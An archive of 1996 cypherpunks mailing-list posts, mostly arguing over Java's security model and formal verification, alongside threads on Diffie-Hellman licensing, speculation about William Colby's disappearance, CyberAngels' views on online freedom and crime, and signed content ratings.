PM, you go on the defensive against TCM, but he was not really 
stating that either the "scruffies" or the "neaties" have an
inherent advantage. it's a feedback loop in security as much
as it is in AI as he described. neither view is incorrect. they
both have their applications.

>Tim misunderstands, thinking this is a case of some foolish
>perfectionists getting mad at the guys who throw things together and
>hope that they work. Not at all. Our problem with Java is the security
>model, which inherently requires perfect design and operation.

again, no one said that you have to use Java for mission critical
applications. please don't criticize it for using the term "secure"
when in fact that is appropriate for its environment. has it
ever claimed to do something it doesn't? have the java designers
ever said, "our code is bug free"? 

 We
>build our own systems to be robust enough to survive our own mistakes.
>Java is built such that any mistake is fatal.

y'know, it may be possible to create an *implementation* for java
that fulfills your demands. you seem to be talking a lot more about
hardware than software. you are free to create any kind of environment
you want for the Java interpreter, including a paranoid system with
multiple firewalls that assumes Java may not do what it claims it does.

>Essentially, this is the optimists versus the realists.

I've noticed how there are two types of thinking: dualistic and
unified. people that are stuck in dualistic thinking always think
that because someone disagrees with them, they are putting them
down. they can't conceive of multiple alternative views on the
same subject, all with relative merits. they may paint their
supposed adversaries as "optimists" and themselves as the 
"realists". a silly game that can go on ad infinitum. I've noticed
that women (well, the ones that are feminine, anyway)
don't seem to get into this kind of debate much,
even when they are present. it's a real man kind of thing.

>PS BTW, Tim, Java is great for the theorem prover fetishizers -- look no
>further than Java's bytecode verifier. I have never built a system
>that required an "active defense" like that. They fill me with the
>same sort of dread I would get from a skyscraper design that required
>a constant flow of electricity to the building lest it collapse. Sure,
>its cool. Maybe it even saves some money. However, can you sleep at
>night inside it?

again, I reiterate: no one asked you to use Java, PM. it has a very
useful place where it was designed for: on the desktop of computer
geeks who get a kick out of mandelbrot generators or remailers or
whatever. you are a businessman in a mission critical situation.
why are you ramming your standards down the throat of a place where
it is inappropriate? 

did the creators of Java say that it is going
to be used in the banking industry? why do you write all your attacks
on it as if they have? do you realize it was intended at first to
be put into *home*appliances*? are you going to die if you occasionally
have to reboot your toaster because a bug? hee, hee, maybe I should 
bite my tongue. maybe you have a "firewall protected toaster arrangement."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 1 May 1996 13:10:08 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: no-cost DH?
In-Reply-To: <Pine.SUN.3.93.960430130125.8652A-100000@eskimo.com>
Message-ID: <199604302115.RAA14679@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Wei Dai writes:
> On Tue, 30 Apr 1996, Bill Frantz wrote:
> > Morris (Cylink): Cylink owns the DH patents.  We are opening the
> > technology with no-cost licenses.  Patents should not be used to block
> > the technology. 
> 
> Does anyone know more about these no-cost licenses?  I wouldn't mind
> getting free DH a year early...

They don't give out licenses for free, but they are selling flat rate
licenses for given products...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Smith <smith@sctc.com>
Date: Wed, 1 May 1996 14:30:39 +0800
To: mpd@netcom.com
Subject: Re: The Joy of Java
Message-ID: <199604302303.SAA27753@shade.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner <sjb@universe.digex.net> quoted the Princeton
paper's concerns about Java's lack of a formal semantic basis,
and mpd@netcom.com (Mike Duvos) replied:

>This is overly pessimistic.  Java primitive data types are fully
>specified and Java operators are well-defined in the sense that
>their results are unambiguous with specified input.  ...

Having some familiarity with application of formal methods to computer
security, I'd like to point out a few things.

>Saying that the current specification does not support formal
>proofs of correctness is far different than saying that the
>language itself is broken.

The experience in the multilevel security world was that a weak or
nonexistent specification pretty much guaranteed that there would be
holes in the design -- limitations that kept you from being able to
block covert channels or other flaws in the kernel.

Language design is as tough a problem, if not more so. Brinch Hansen
told a story over a decade ago about how he tried to specify a
language with good semantics, and had Tony Hoare review his attempts.
There always seemed to be a flaw somewhere and they weren't trying to
capture object semantics back then, just types. So, in the absense of
rigor there's probably not much sense in assuming correctness.

>... he is not saying that the type verifier isn't correct,
>merely that the materials with which to construct a proof have
>not yet been dumped on top of his desk.

When doing formal specification of a high assurance MLS system, a
large proportion of flaws were found simply through the process of
producing the formal specifications, both of the device design and of
the security requirements. A large proportion of the design flaws are
found while doing the formal proofs.

Note that Java operating in the Internet environment acquires two sets
of security requirements: the original ones for the language plus
another set that applies to the platform (workstation) it runs on. The
former set of requirements were pretty thoroughly worked out, though
it doesn't appear that they were ever formalized. This seems to be
the primary topic of discussion here, but not the only one.

As of last winter, when I last checked into it, the latter set of
requirements hadn't been specified in any reasonable detail. Such a
spec would reflect the security requirements for running on a
workstation that requires some measure of confidentiality. For
example, consider the CEO's workstation: the SEC has rules about
keeping certain things secret, and that stuff tends to live in files
on a CEO's workstation. Of course, the problem also applies to anyone
who has unwrapped PGP keys lying about when some applet turns
malicious.

>In any case, the anarchy of the free market rarely takes notice
>of the theoretical musings of academicians.  Until Java
>experiences a catastrophic and public train wreck, people will
>continue to use it and its reputation will continue to grow.

The only reason MLS systems were formally specified and analyzed was
because the DOD wanted to avoid a computer based train wreck involving
intelligence data or other stuff of comparable sensitivity. They had
money and market clout, at least when they started.

Rick.
smith@sctc.com          secure computing corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 1 May 1996 13:52:57 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Former CIA Director and *Strategic Investment* Editor
In-Reply-To: <m0uEN3x-00091PC@pacifier.com>
Message-ID: <Pine.SUN.3.93.960430174510.614K-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 30 Apr 1996, jim bell wrote:

> At 04:46 PM 4/30/96 -0400, Black Unicorn wrote:

> >> last I heard.   Maybe he just decided that he wanted to disappear in a 
> >> comparatively non-suspicious fashion?
> >
> >Having met Colby and being somewhat familiar with his political skills I
> >would be surprised if he would ever think a drowning accident was
> >"non-suspicious."
> 
> Notice that I said "comparatively" non-suspicious.  Can you think of any 
> LESS suspicious way to appear to die and still explain no body being found?

Many.  You lack imagination.

[...]

> >I hope he is found alive and well.
> 
> He might very well be alive.  But it's almost certain he won't be found...

Your conspiracy nut side is showing.

> BTW, the news item I read this morning stated that his neighbors called the 
> cops when they noticed that his car was still at the cabin Sunday 
> night...after the time he normally left to return home.  While most people 
> wouldn't see a problem with this, I do:  How many citizens are so aware of 
> the schedules and habits of their neighbors that they would become 
> suspicious if their neighbor stayed TOO LONG?

Colby was well known and friendly to his neighbors.  He was an
impressively outgoing person, a trait which showed both in his
unprecidented opening of the Agency (he was dismissed for cooperating too
completely with congress), and his personal life.  His neighbors in
Virginia were all close friends and the community there is very close
knit.  A pile of leaves in the wrong place attracts attention.

I used to run a private seminar in D.C.  The two times I asked, he was
happy to come and speak for us.  He was always amazingly frank and
engaging. Not at all a secretive man when it came to his personal beliefs
and activities.

> Not days and days too long, 
> just a few hours?  Or were Colby's habits so precise and predictable (and 
> known to be so!) that his neighbor would call the cops just because he, 
> ONCE, stayed a little longer than normal?

Yes, they were.  He ran an active consulting business in D.C. and returned
to the city on a regular schedule.  In addition, he was very prudent about
letting people know when he was about to go out on the river.  The man was
in his 70s, of course he generated a good deal of concern amongst his
neighbors.

> What's wrong with this picture?

It's not hard to see.  As usual you are theorizing and speculating about
issues and persons you have no connection to.  Even in the face of someone
with personal experience as to the matter at hand you persist in asserting
that you are more 'in the know.'

In this particular case you are discussing someone I know personally.

Given the circumstances, your rumor mongering is both classless and
distasteful.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 1 May 1996 15:01:38 +0800
To: perry@piermont.com
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
Message-ID: <adabfd860b0210043451@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:18 PM 4/30/96, Perry E. Metzger wrote:
>Timothy C. May writes:

>> Perry, that essay was, as I said, sent out before it was finished.
>[...]
>> Now, while you may have _anticipated_ the point I was going to make in the
>> completed essay, you cannot say I have "mischaracterized" anyone's attitude
>> at this point!
>
>I could only respond to the statments you made, not the ones you could
>have made.

OK, Perry, I just have to give up on you. It's hopeless. You claim I
mischaracterized your position on Java and scruffies/neats when in fact I
never mentioned either your name nor the connection of my points to Java. I
point this out and you reply with some smartass comment which is completely
disingenuos.

Just as when you claimed Java applications can't do file i/o, and several
people point out that you are wrong and that it is _applets_ that you must
have been thinking of (and not even always for applets, by the way).
Instead of admitting you were wrong, or misread the post, you just say
"Same difference."

It's pointless to try to have a discussion with you. Which is too bad.

>In any case, I'm not sure that there is such a thing either as a
>"Security Scruffy" or a "Security Neat" in the argument about Java;
>the breakdown in opinions occurs along very different lines.

I suggest you wait until you see what I have to say on this before jumping
the gun by assuming you know what it is I'm going to say (or that someone
saying "application" must have really meant to say "applet").

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 1 May 1996 13:59:28 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Former CIA Director and *Strategic Investment* Editor
In-Reply-To: <m0uEN3x-00091PC@pacifier.com>
Message-ID: <Pine.SUN.3.93.960430181407.614M-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




I typoed.

Virginia should read "Maryland" in my last post.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 1 May 1996 15:42:16 +0800
To: cypherpunks@toad.com
Subject: Re: Former CIA Director and *Strategic Investment* Editor
Message-ID: <m0uEQce-00090dC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:49 PM 4/30/96 -0700, Timothy C. May wrote:

>
>Looking for conspiracies in the almost certainly accidental drowning of
>Colby is an even bigger waste of time than spending vast efforts trying to
>show that Vince Foster was killed by the O.T.O.


Why are you the second person to use the term "conspiracy" when  I didn't 
mention such a thing?  Got "conspiracies" on your brain, Tim?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Wed, 1 May 1996 14:24:22 +0800
To: cypherpunks@toad.com
Subject: Re[2]: Free speech debate on MSN Encarta
Message-ID: <9603308309.AA830914378@cc1.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     
IMO, it's simpler than that:  suppose your favorite rater (SafeForChildren, 
SafeForCongressCritters, SafeFor<our>Church, ...) has a PGP-style key.  If they 
rate a page as OK for their subscribers to read, the rater signs the page with 
it's private key and requests the page owner to include that signature on the 
page.  If you want to limit what you read to what they approve, you read only 
those pages whose signatures can be verified with the trusted rater's public 
key.  BTW, you could put the signature verification into the WEB browser rather 
than the proxy and keep the overhead out in the user's PC.

Would need extensions to HTML standards; e. g. <rated_by xxxyyyzzz = 
0123456789abcdef_hash>.  This would be the hash over the entire page _excluding_
the "rated_by portion(s) so that multiple raters could exist and interoperate.

Martin G. Diehl

Just my own opinion.
______________________________ Reply Separator _________________________________
Subject: Re: Free speech debate on MSN Encarta
Author:  jpb@miamisci.org (Joe Block) at Internet-USA
Date:    3/24/96 4:06 PM


At 8:57 PM 3/23/96, Mark M. wrote:
On Sat, 23 Mar 1996, I wrote:
>> However, I don't think it likely that many ISPs will go this route from a 
>> liability point of view - if some parent is paying them to filter out smut, 
>> and little Zippy finds a brand new x-rated site, chances are some irate
     
     [snip]
     
I agree, if you're going to bother with rating pages, digitally signing the 
signature so that terrorist X can't just copy the "Good Clean Fun" rating 
code into his Phosgene formula page is the only rational solution.
     
Gotta love that overhead, though.
     
     
Joseph Block <jpb@miamisci.org>
     
"We can't be so fixated on our desire
 to preserve the rights of ordinary Americans ..."
 -- Bill Clinton  (USA TODAY, 11 March 1993, page 2A)
PGP 2048bit-Fingerprint: F8 A2 A5 15 56 42 9B 16  3F BD 57 0F 8A ED E3 21
No man's life, liberty or property are safe while the legislature is in session.
     
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 1 May 1996 15:37:12 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Former CIA Director and *Strategic Investment* Editor
Message-ID: <m0uERoX-000938C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:15 PM 4/30/96 -0400, Black Unicorn wrote:
>
>
>I typoed.
>
>Virginia should read "Maryland" in my last post.

That's okay; it was only a small slip.

Small.  Maybe the same magnitude as that secretary who said that Vincent 
Foster's body was first found in "the parking lot" rather than "the park."  
Right?  (I don't really even care about Vincent Foster, BTW.)

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: angels@wavenet.com (CyberAngels Director : Colin Gabriel Hatcher)
Date: Wed, 1 May 1996 15:52:01 +0800
To: perry@piermont.com
Subject: Re: Freedom and security
Message-ID: <v01510102a9e6b9e2e417@[198.147.118.163]>
MIME-Version: 1.0
Content-Type: text/plain



>You will pardon my asking this, but, security from what? Who are the
>evil Network Terrorists throwing Bit Bombs or whatever? The only
>security you need on the internet is keeping your site from being
>broken in to, which is mostly a matter of setting it up
>properly. What, exactly, is the "Security" that you are offering us?
>
>Perry

I am not offering "you" anything unless you have a problem and are looking
for some assistance.  Just because you feel safe / immune from becoming a
victim of internet crime does not mean that there are no victims at all.

Site security is not at all the only problem.  Are you not aware of spams
and scams going on all the time?  Are you not aware that sexual predators
operate in IRC? Or that child pornography is a world wide trading game?
Have you never heard of email forgeries or impersonation?  What about tthe
victims of harassment and hatred who don't know how to deal with it?  What
about all the people who have never heard of killfiles?  Who don't know how
to report a problem nor who to report it to?   Haven't you ever been mail
bombed and wished you could find out who did it?

Maybe you feel like a veterano and can afford to look condesendingly at all
the thousands of fresh-faced netizens just arriving online and say "well if
they can't take the heat they should stay out of the fire" - but if we are
to call ourselves an emerging "community" then we must take responsibility
for our city, and that means caring about other people's problems.

The internet is not just a collection of bits and bytes - it's real people
doing real things to each other.

When your address is forged and you get flamed and bombed, or if you start
receiving anonymous death threats, your freedom is under threat.  It's not
enough to say "Well I just turn off my monitor"

The Internet is a city - it needs 911 services and it needs Neighborhood
Watches.  And neither professional law enforcement nor neighborhood watch
are by definition a threat to anyone's freedom.  Freedom within the context
of Community does not and never has meant the freedom to kill your
neighbor, or rob someone, or rape someone, or harm someone.  In the context
of the internet Community too, freedom is not the individual's right to do
whatever he or she likes - because then the Community is no longer free.

Freedom is under threat from two directions - from selfish individuals who
care little for the Community, and from the over zealousness of governments
who seek greater and greater control over individual thought and action.

The first step is to acknowledge that we have a problem within the Internet
Community - because if we don't address it responsibly then we have only
ourselves to blame when the governments try to take it over.  We can face
our problems or we can deny that they exist.

By asking me the question: "What crime?" you are indicating to me that you
prefer denial.


*********************************************************
Colin Gabriel Hatcher - CyberAngels Director
angels@wavenet.com

"Two people may disagree, but
that does not mean that one of them is evil"

*********************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: angels@wavenet.com (CyberAngels Director : Colin Gabriel Hatcher)
Date: Wed, 1 May 1996 15:05:27 +0800
To: Mike McNally <m5@vail.tivoli.com>
Subject: Re: Freedom and security
Message-ID: <v01510103a9e6ca1eb494@[198.147.118.163]>
MIME-Version: 1.0
Content-Type: text/plain



 Mike McNally wrote


>What exactly do you consider "security" and "freedom" to mean here?  Whose
>security?  Whose freedom?

Every society has a social contract whereby the freedom of the individual
is defined within the context of the society.  Freedom means your freedom
to be who you want to be, think how you want to think, say what you want to
say, hold whatever beliefs you wish, balanced against the Community's need
for stability.  You may demand the freedom to kill those who disagree with
you but no community will grant you that freedom.  But no one living in a
community where murder is outlawed can serious claim that their freedom has
been taken away by that particular law.  You cannot be free to speak your
mind unless there are laws preventing others who disagree with you from
killing you.  If it were permitted to kill those who disagreed with you,
then no one would be free to speak their mind at all, for fear of the
consequences.

Hence my point about freedom and security - by which I mean personal
security.  Freedom of speech cannot function without law.


>I can take responsibility for ensuring that any Internet communications I
>make are protected from inspection or interception by using technological
>solutions.  I call that "security".  If you're interested in "security",
>what are you doing to protect my freedom to use encryption and anonymous
>remailer technologies?

I am not currently aware that either your right to encrypt nor your right
to use anon remailers is under threat, so why should I do anything?  But
while encryption and anon remailing protect *you* from certain threats to
your freedom, they are also being used for example to make the
international trade in child pornography more effective and less easy to
prosecute.  The technology itself is neutral and can be used or abused.
That is why the focus should be on individual actions rather on the
technology.

My concern is not so much with network sabotage or infiltration (there are
plenty enough organizations addressing that problem) but with personal
safety within the Internet community - that means you, not your hard drive.


*********************************************************
Colin Gabriel Hatcher - CyberAngels Director
angels@wavenet.com

"Two people may disagree, but
that does not mean that one of them is evil"

*********************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Wed, 1 May 1996 15:21:16 +0800
To: cypherpunks@toad.com
Subject: Re: WhoWhere.com v. that stanford.edu loon
Message-ID: <199605010257.TAA02118@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Monday night, I wrote:
>I am confident that the Parsec folks are now acting in good faith, and
>that they are now sensitive to the relevant privacy and ethical issues.
[parsec.com = whowhere.com]

I may have spoken too soon.

I might be interested in talking, privately, with their venture capitalists
and allies, which include Netscape and InfoSeek.

I think if you want a service of this kind, those four11.com guys, who
started out with the SLED PGP key certification service, are absolutely
terrific.

- -rich
 [not on cypherpunks -- no, not just because I'm throwing a tantrum; I'm
 honestly embarrassed at my own behavior, and need a break.]


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMYbSd43DXUbM57SdAQGLGQP/WL/IWBM2rjpChUtn20T+iylKgtvqE3GT
nqs45S1M4YAV/0sQcbhjCr9ZDkyH60ei4VpORLaXy+J3EHkEFMO9j0KKGEU9nWAQ
T2R7YIIziWkQXDO92M08ezfXlT6hwRKCqf9VhfLl+PGEdBgVfAE2oS8exmQtEkF1
Td89ZQD+VT0=
=ddQ0
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 1 May 1996 14:38:17 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Why were smart cashcards first introduced in the third world?
In-Reply-To: <Pine.SUN.3.91.960430100509.16499H-100000@viper.law.miami.edu>
Message-ID: <Pine.SV4.3.91.960430200147.10617A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 30 Apr 1996, Michael Froomkin wrote:
> Subject: Re: Smartcards are coming to the US
> 
> Lack of entrenched competitors? E.g. credit cards?


   Let's talk about the boondocker provinces of the Philippines, with
which I am intimately familiar. Domestic credit cards exist, but only are
accepted at larger establishments. Although some, for example, Philippine
Airlines, will _not_ accept the local cards, but are happy to accept
foreign-issued cards. 

There is a major shortage of coins and currency. I am not joking. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 1 May 1996 14:38:55 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Former CIA Director and *Strategic Investment* Editor
In-Reply-To: <Pine.SUN.3.93.960430164418.614B-100000@polaris.mindport.net>
Message-ID: <Pine.SV4.3.91.960430201351.10617C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


The guy I really liked was what's-his-face, the DCI who passed away 
during the REagan gameshow. Guy was cool, cause he always wore a hat.

Just like the Soviet leaders, now that I think about it.

Someday, walking sticks and hats will return to fashion. The South will 
rise again.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 1 May 1996 16:12:59 +0800
To: cypherpunks@toad.com
Subject: Update II/113- Election Hoax (fwd)
Message-ID: <199605010331.UAA26284@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Tue, 30 Apr 96 13:38 CDT
From: sns@borealis.com
To: shomronnews@felix.dircon.co.uk
Subject: Update II/113- Election Hoax

SNS News Service  "Election Hoax"
April 30, 1996.. 11 Iyar 5756..Volume II,  Number 113 ..Update from Israel 


[snip]

 Election Hoax
According to a report released by the prestigious Jane's Defense Weekly, the
new missile agreement between Israel and the United States is politically
motivated and does not hold water.

Mr. Christopher Fosi, an Editor of the Jane's Defense Weekly, and Mr.
Douglas Barry,  Aviation and Defense Editor of Flight International Weekly
Magazine,   stated the Nautilus Anti-Missile System is at least 4 years from
being ready. 

The report states the system is "a poor fit or just does not meet Israel's
needs". The report explains that since the Katusha rockets are launched from
mobile sites, they can be moved around in a pick-up truck and this is just
one reason the system is ineffective. Fosi discounts tests that were carried
out in Mexico as not accurate and stated the reasons behind the ceremony
surrounding the new missile deal appear to be political in nature, rather
than a military-defensive move to protect Israel from Hizbullah rockets. 

The report also explains that Israel's Arrow Anti-Missile System is also not
designed for Katusha rockets and is not an effective deterrent.  Despite
promises by President Clinton to supply Israel with an operational Nautilus
system by late 1997, the two experts state it is not reality. (UPI..4/30,
Ma'ariv Newspaper..4/30..Page 2).

				****






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 1 May 1996 14:56:47 +0800
To: "L. Detweiler" <vznuri@netcom.com>
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <199605010015.RAA15723@netcom15.netcom.com>
Message-ID: <199605010033.UAA15101@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"L. Detweiler" writes:
> well, are you saying it would be impossible to do such a thing
> [produce a safe execution environment] in a distributed programming
> language?

It is difficult. The way Java does this, with the protection relying
solely on the correctness of the runtime (the interpreter isn't
emasculated so flaws in the runtime can cause unexpected behavior) it
is nearly impossible. Humans aren't good enough at designing systems
this century.

> furthermore, you are imposing a virtual military-level degree of
> security to something that does not seem to require it. if
> a virus gets loose on someone's computer because of Java, what's
> the harm?

The Web is the universal marketplace these days. Being unable to use
the web is the equivalent of being unable to use the phone. I have
research analysts at large trading houses begging for
Netscape. Unfortunately, these people have a need for top notch
security, because vast amounts of money are at stake.

So, yes, if you are going to create a product that everyone on earth
has to be able to use, it had damn well not explode in your face every
once in a while. Imagine if all the world's refrigerators had a 1 in
10,000 chance of blowing up on you. "Whats the harm" you say. Well,
most people don't expect that sort of behavior in a friendly consumer
appliance that nice people from Sun and Netscape guarantee is
absolutely positively safe except for all the bugs.

> you are designing systems that when broken cost bazillions
> of dollars, potentially. what does Java cost when it breaks?

It costs all the same things the the firewalls are protecting.

> who is saying that one should use Java for extremely mission
> critical situations such as funds transfer?

No one. Unfortunately, when the same machine runs Netscape so the
trader can read the UUNet/MFS merger press release and also has the
big shiny red "trade!" button on some application, you get nervous.

As I said, the traders don't expect that their phone will explode when
they pick it up, or that every piece of literature they get in the
mail may be coated with contact poison. Well, Java is a silent
killer. It soon is going to be sitting on every desktop at every
company in America and its being sold as the new paper or phone. Its
also sitting on all those PCs running "Quicken" that helpfully now can
do direct electronic funds transfer from your account, etc. If you
don't care about the security of your bank account, well, sure, you
have nothing to worry about.

In short, my clients need security today. Your home computer probably
needs it soon if not now, and if you think your business can survive a
few days without its computers, please, by all means, run without
security.

> again, no one said that you have to use Java for mission critical
> applications.

Its not Java crashing that I worry about. Its everything else on the
computer and the network it is attached to that needs protection.

> did the creators of Java say that it is going
> to be used in the banking industry?

Well, sorry, you try to keep it off the desks in the banking industry
if you can.

> do you realize it was intended at first to be put into
> *home*appliances*? are you going to die if you occasionally have to
> reboot your toaster because a bug?

No, but you could die if someone gets your toaster to catch fire, or
gets your microwave oven to do something the hardware wasn't supposed
to. It might also be very annoying if your home security system
stopped working, or if your smoke detectors didn't detect smoke, or even
if your fridge decided that it didn't like a string overflow in the
interpreter and decided to stop refrigerating.

Life critical applications or important financial applications are all
around us. You just don't seem to notice.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 1 May 1996 14:39:34 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <adabfd860b0210043451@[205.199.118.202]>
Message-ID: <199605010047.UAA15120@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> Just as when you claimed Java applications can't do file i/o, and several
> people point out that you are wrong and that it is _applets_ that you must
> have been thinking of (and not even always for applets, by the way).
> Instead of admitting you were wrong, or misread the post, you just say
> "Same difference."

Yup. Same difference. I typed the wrong word when producing my
post. The context was using "safe java" for markets in CPU cycles. In
that context, yes indeed, "safe" Java programs, applets, or whatever
you want to call them that you get over the network and can "trust"
aren't supposed to be able to do file i/o. The whole point was that
Java doesn't provide the execution environments you need for CPU cycle
markets. Sometimes my statements are incorrect, but its very rare
indeed that I don't know what I was trying to say.

> I suggest you wait until you see what I have to say on this before jumping
> the gun by assuming you know what it is I'm going to say (or that someone
> saying "application" must have really meant to say "applet").

As I said (and you called me a smartass for saying -- how polite of
you, by the way) I could only reply to what you posted, not to what
you could have posted. There was no indication in your accidental
partial post that it was an accidental partial posting. I'm not a
psychic.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: angels@wavenet.com (CyberAngels Director : Colin Gabriel Hatcher)
Date: Wed, 1 May 1996 16:00:46 +0800
To: liberty@gate.net (Jim Ray)
Subject: Re: Freedom and security
Message-ID: <v01510108a9e71a45899e@[198.147.118.163]>
MIME-Version: 1.0
Content-Type: text/plain


Jim Ray wrote

> Freedom is already diminishing at an alarming pace.
>That is why cypherpunks spread crypto, and why Libertarians like
>me rant. Freedom does not increase through more laws.

Nor does freedom increase through less laws or no laws.  Freedom increases
as respect and care for one another increases.  Meanwhile, since we do not
live in utopia, all societies at a certain level of economic development
and of a certain size of population require law and law enforcement to
protect citizens from predators.

The Internet is beyond the stage of small communities exercising informal
social controls (peer pressure).  It's now a major industrial city and will
develop law, law enforcement and government, whether anyone likes it or
not, not least because the Community will always respond to crime by trying
to protect itself.  And the crime is already here.  The idea that the
Internet is not controlled is IMHO one of the biggest myths around.  It's
like a large group of people are still living in some far-off utopian rural
paradise.  Does anyone really doubt the extent of State control and power
across the Net?  My point is that this is inevitable.  The Internet is a
mirror of the rest of the world, not a new form of society, and I fail to
understand why anyone should be surprised that that is the case.

 >.... laws only breed more laws, which always lead to
>less freedom.

I disagree with this statement. I do not believe that laws breed more laws
nor that laws lead to less freedom.  I believe bad laws compromise freedom
(eg CDA) while good laws protect freedom.

>>I don't believe that security is the enemy of
>>freedom.  I believe that freedom needs security in order to exist at all.
>
>Good. Join us in spreading cryptography around, and security will
>bloom (along with freedom).

Cryptography enhances and protects privacy, which does not inevitably lead
to greater security.  Security for the sender, yes, in that no one else can
read the message, but security for the Community?  Doesnt that depend what
the message said?  The technology itself is neutral.  Child pornographers
encrypt their hard drives so that law enforcement cannot gather crime
evidence - that is certainly a state of greater security for the
pornographer, but it does not improve our Community, and as child
pornography increases, the law is by definition broken more and more, and
so the Community becomes less free than before.  And that's not the tyranny
of government but the tryanny of criminals.

I do in fact support cryptography for personal security, not least because
I can ensure that my messages are authenticated.  CyberAngels PGP public
key will be up on our new website opening very soon.  I've had enough of
people forging my email.


*********************************************************
Colin Gabriel Hatcher - CyberAngels Director
angels@wavenet.com

"Two people may disagree, but
that does not mean that one of them is evil"

*********************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 1 May 1996 14:55:27 +0800
To: cypherpunks@toad.com
Subject: Re: Former CIA Director and *Strategic Investment* Editor
In-Reply-To: <Pine.SUN.3.93.960430164418.614B-100000@polaris.mindport.net>
Message-ID: <wu68mD278w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> writes:
> On Tue, 30 Apr 1996, jim bell wrote:
> > At 07:40 PM 4/29/96 EDT, Dr. Dimitri Vulis wrote:
> > >jim bell <jimbell@pacifier.com> writes:
> > >> At 04:06 AM 4/29/96 -0700, anonymous-remailer@shell.portal.com wrote:
> > >> >CNN is reporting that Colby's canoe has been found on the Potomac and
> > >> >Colby is missing.
> > >>
> > >> Don't tell me, let me guess:  The guy who rented the canoe to him has
> > >> suddenly retired, and has been reportedly seen going on a Park Avenue
> > >> shopping spree.  Right?
> > >
> > >Jim, I don't find dumb jokes about dead people I liked particularly funny.
> >
